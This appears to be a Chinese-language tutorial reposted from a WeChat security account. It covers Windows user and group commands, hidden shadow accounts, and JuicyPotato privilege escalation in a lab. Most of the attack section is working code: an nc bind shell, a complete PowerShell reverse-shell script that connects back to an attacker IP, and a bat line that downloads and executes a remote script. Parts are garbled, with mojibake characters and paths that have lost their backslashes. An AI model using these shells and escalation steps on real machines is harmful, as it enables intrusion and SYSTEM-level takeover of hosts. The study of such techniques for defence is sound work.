一、Windows用户与组

1、Windows用户的分类

guest：游客账户权限

user：普通用户权限

administrator：管理员用户权限

ststem：机器最高权限

2、用户相关命令

net user//查看有多少用户

net user administrator//查看administrator账户的信息

net user test passwd /add//创建用户设置密码

net user test /del//删除用户

net user test$ passwd /add//隐藏账户，影子用户，需要用管理组才能看到

3、组相关命令

net localgroup//查看有哪些组

net localgroup administrators//查看组中用户

net localgroup testgroup /add//增加组

二、Potalo家族提权

是通过各种方式和在本地NTLM中继承获取system令牌，再模拟令牌执行命令。

NTLM：简单来说，Windows会将密码放置内存中，NTLM hash加密之后，进行比对。

system令牌：用户登录之后，会有一个权限标识，可以比作我们的学生卡，教师卡，登录之后根据你的身份分配卡。

1、提权条件

获取高权限令牌--token

拥有SeImpersonatePrivilege 或 SeAssignPrimaryTokenPrivilege 权限

可以利用whoami /priv命令查看是否有上面两个权限

以下用户拥有SeImpersonatePrivilege权限：

本地管理员账户和本地服务账户

由SCM（服务控制管理器）启动的服务

由组件对象模型 (COM) 基础结构启动的并配置为在特定帐户下运⾏的COM服务器

当用户具有SeImpersonatePrivilege 特权，可以调⽤ CreateProcessWithTokenW 以某个Token的权限启动新进程。

当⽤户具有 SeAssignPrimaryTokenPrivilege 特权，可以调⽤ CreateProcessAsUserW

以指定⽤户权限启动新进程。

Windows 服务使⽤的登录账号：

NT AUTHORITYSystemNT AUTHORITYNetwork ServiceNT AUTHORITYLocal Service

2、提权方式

1、JuicyPotato

实现原理

通过DCOM 来使服务向攻击者监听的端⼝发起连接并进⾏NTLM认证。

DCOM主要是Windows的一个封装的组件，可以交互通讯，利用这个接口，可以对网络发送请求。

枚举可⽤COM对象的⽅法（获取对应的 CLSID）：

https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

它的一个大概的方式，就是需要先获取对应的CLSID

每个dcom都会对应一个CLSID

https://ohpe.it/juicy-potato/CLSID/

实验

环境预设： 

win7 -- 账户：bai（⾮administrators组），ip：192.168.195.129，拥有 

SeImpersonatePrivilege（身份验证后模拟客户端） 权限。 这个权限正常是服务用户和管理员用户拥有，这里可以强行设置，为了实验

kali -- ip：192.168.195.130 

这里首先我们模拟已经利用nc初步链接上了目标

目标端执行：

nc.exe -lvp 999 -e c:windowssystem32cmd.exe

我们这里用一个正向链接

黑客端开启

nc -nv 目标ip 3333

获取到链接之后，可以使用

chcp 65001

修改编码为utf-8

之后我们下一步操作，查找对应的CLSID

查找对应的CLSID

这里我们首先下载

https://github.com/ohpe/juicy-potato/tree/master

这里整个文件包，里面有一个test文件夹

然后我们需要下载juicypotato的exe文件

之后我们需要到CLSID文件夹中找到对应的系统

这里我们目前事win7，我们就需要到win7文件夹下面，复制CLSID.list到test文件夹下，然后再将上面的exe文件也放到test目录下，我们直接通过执行test_clsid.bat来测试

之后下面会有一个result.log文件，这里就是测试之后的日志，我们打开之后找后面事system权限的

然后复制前面的clsid进行测试，直到可用为止

提权

我们可以直接执行命令

JuicyPotato.exe -t * -p C:windowssystem32cmd.exe -l 1337 -c

{03ca98d6-ff5d-49b8-abc6-03dd84127020}

调用出来system权限的cmd框，但是这里仅限于可以远程3389链接的主机，如果我们是纯粹的命令行要怎么办呢，这里我们就需要写一个bat脚本来运行一个nc，去连接到黑客机器来获取权限。我们也可以直接利用这个system权限去运行一个木马程序。

这里我们首先建一个rev.ps1文件，这个文件是powershell的运行文件

function Invoke-PowerShellTcp{     [CmdletBinding(DefaultParameterSetName="reverse")] Param(         [Parameter(Position = 0, Mandatory = $true,ParameterSetName="reverse")]         [Parameter(Position = 0, Mandatory = $false,ParameterSetName="bind")]         [String]         $IPAddress,         [Parameter(Position = 1, Mandatory = $true,ParameterSetName="reverse")]         [Parameter(Position = 1, Mandatory = $true,ParameterSetName="bind")]         [Int]         $Port,         [Parameter(ParameterSetName="reverse")]         [Switch]         $Reverse,         [Parameter(ParameterSetName="bind")]         [Switch]         $Bind ) try {     #Connect back if the reverse switch is used.     if ($Reverse)     {         $client = New-Object         System.Net.Sockets.TCPClient($IPAddress,$Port)     }     #Bind to the provided port if Bind switch is used.     if ($Bind)     {         $listener = [System.Net.Sockets.TcpListener]$Port         $listener.start()          $client = $listener.AcceptTcpClient()     }     $stream = $client.GetStream()     [byte[]]$bytes = 0..65535|%{0}     #Send back current username and computername     $sendbytes = ([text.encoding]::ASCII).GetBytes("WindowsPowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")     $stream.Write($sendbytes,0,$sendbytes.Length)     #Show an interactive PowerShell prompt     $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get锟綥ocation).Path + '>')     $stream.Write($sendbytes,0,$sendbytes.Length)     while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)     {         $EncodedText = New-Object -TypeNameSystem.Text.ASCIIEncoding         $data = $EncodedText.GetString($bytes,0, $i)         try         {             #Execute the command on the target.             $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )         }         catch         {             Write-Warning "Something went wrong with execution of command on the target."             Write-Error $_         }             $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '             $x = ($error[0] | Out-String)             $error.clear()             $sendback2 = $sendback2 + $x             #Return the results             $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)             $stream.Write($sendbyte,0,$sendbyte.Length)             $stream.Flush()          }         $client.Close()         if ($listener)         {             $listener.Stop()         }     }     catch     {         Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."         Write-Error $_     }}Invoke-PowerShellTcp -Reverse -IPAddress 192.168.195.130 -Port 9999

上面文件最后一样就是我们要连接的黑客机器的地址

然后我们需要新建一个rev.bat文件来运行这个powershell文件

Powershell -executionpolicy unrestricted "IEX(New-Object Net.WebClient).DownloadString('http://172. 16.42.1/Rev.psl')"

我们这里就需要将ps1文件挂到服务器之类上面，提供远程下载，这样最后我们就可以以system权限，利用nc连接上

服务器开启远程下载

我这里使用bat文件

Powershell -executionpolicy unrestricted "c:nc.exe -lvp 9999 -e c:windowssystem32cmd.exe"

运行之后使用kali接收即可

原文始发于微信公众号（白安全组）：Windows提权的基础学习